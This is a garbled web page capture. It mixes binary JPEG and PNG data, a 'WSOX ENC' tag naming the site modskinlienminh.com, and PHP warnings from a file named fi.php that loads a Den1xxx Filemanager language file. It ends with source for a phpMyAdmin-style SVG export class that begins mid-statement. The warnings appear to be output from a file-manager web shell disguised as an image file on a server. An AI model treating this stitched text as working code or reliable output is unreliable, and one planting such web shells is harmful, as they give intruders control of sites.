1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
openMemory(); /* * Set indenting using three spaces, * so output is formatted */ $this->setIndent(true); $this->setIndentString(' '); /* * Create the XML document */ $this->startDocument('1.0', 'UTF-8'); $this->startDtd('svg', '-//W3C//DTD SVG 1.1//EN', 'http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd'); $this->endDtd(); } /** * Set document title * * @param string $value sets the title text */ public function setTitle($value): void { $this->title = $value; } /** * Set document author * * @param string $value sets the author */ public function setAuthor($value): void { $this->author = $value; } /** * Set document font * * @param string $value sets the font e.g Arial, Sans-serif etc */ public function setFont(string $value): void { $this->font = $value; } /** * Get document font * * @return string returns the font name */ public function getFont(): string { return $this->font; } /** * Set document font size * * @param int $value sets the font size in pixels */ public function setFontSize(int $value): void { $this->fontSize = $value; } /** * Get document font size * * @return int returns the font size */ public function getFontSize(): int { return $this->fontSize; } /** * Starts RelationStatsSvg Document * * svg document starts by first initializing svg tag * which contains all the attributes and namespace that needed * to define the svg document * * @see XMLWriter::startElement() * @see XMLWriter::writeAttribute() * * @param int $width total width of the RelationStatsSvg document * @param int $height total height of the RelationStatsSvg document * @param int $x min-x of the view box * @param int $y min-y of the view box */ public function startSvgDoc($width, $height, $x = 0, $y = 0): void { $this->startElement('svg'); if (! is_int($width)) { $width = intval($width); } if (! is_int($height)) { $height = intval($height); } if ($x != 0 || $y != 0) { $this->writeAttribute('viewBox', sprintf('%d %d %d %d', $x, $y, $width, $height)); } $this->writeAttribute('width', ($width - $x) . 'px'); $this->writeAttribute('height', ($height - $y) . 'px'); $this->writeAttribute('xmlns', 'http://www.w3.org/2000/svg'); $this->writeAttribute('version', '1.1'); } /** * Ends RelationStatsSvg Document * * @see XMLWriter::endElement() * @see XMLWriter::endDocument() */ public function endSvgDoc(): void { $this->endElement(); $this->endDocument(); } /** * output RelationStatsSvg Document * * svg document prompted to the user for download * RelationStatsSvg document saved in .svg extension and can be * easily changeable by using any svg IDE * * @see XMLWriter::startElement() * @see XMLWriter::writeAttribute() * * @param string $fileName file name */ public function showOutput($fileName): void { //ob_get_clean(); $output = $this->flush(); ResponseRenderer::getInstance()->disable(); Core::downloadHeader( $fileName, 'image/svg+xml', strlen($output) ); print $output; } /** * Draws RelationStatsSvg elements * * SVG has some predefined shape elements like rectangle & text * and other elements who have x,y co-ordinates are drawn. * specify their width and height and can give styles too. * * @see XMLWriter::startElement() * @see XMLWriter::writeAttribute() * @see XMLWriter::text() * @see XMLWriter::endElement() * * @param string $name RelationStatsSvg element name * @param int $x The x attr defines the left position of the element * (e.g. x="0" places the element 0 pixels from the * left of the browser window) * @param int $y The y attribute defines the top position of the * element (e.g. y="0" places the element 0 pixels * from the top of the browser window) * @param int|string $width The width attribute defines the width the element * @param int|string $height The height attribute defines the height the element * @param string|null $text The text attribute defines the text the element * @param string $styles The style attribute defines the style the element * styles can be defined like CSS styles */ public function printElement( $name, $x, $y, $width = '', $height = '', ?string $text = '', $styles = '' ): void { $this->startElement($name); $this->writeAttribute('width', (string) $width); $this->writeAttribute('height', (string) $height); $this->writeAttribute('x', (string) $x); $this->writeAttribute('y', (string) $y); $this->writeAttribute('style', (string) $styles); if (isset($text)) { $this->writeAttribute('font-family', (string) $this->font); $this->writeAttribute('font-size', $this->fontSize . 'px'); $this->text($text); } $this->endElement(); } /** * Draws RelationStatsSvg Line element * * RelationStatsSvg line element is drawn for connecting the tables. * arrows are also drawn by specify its start and ending * co-ordinates * * @see XMLWriter::startElement() * @see XMLWriter::writeAttribute() * @see XMLWriter::endElement() * * @param string $name RelationStatsSvg element name i.e line * @param int $x1 Defines the start of the line on the x-axis * @param int $y1 Defines the start of the line on the y-axis * @param int $x2 Defines the end of the line on the x-axis * @param int $y2 Defines the end of the line on the y-axis * @param string $styles The style attribute defines the style the element * styles can be defined like CSS styles */ public function printElementLine($name, $x1, $y1, $x2, $y2, $styles): void { $this->startElement($name); $this->writeAttribute('x1', (string) $x1); $this->writeAttribute('y1', (string) $y1); $this->writeAttribute('x2', (string) $x2); $this->writeAttribute('y2', (string) $y2); $this->writeAttribute('style', (string) $styles); $this->endElement(); } }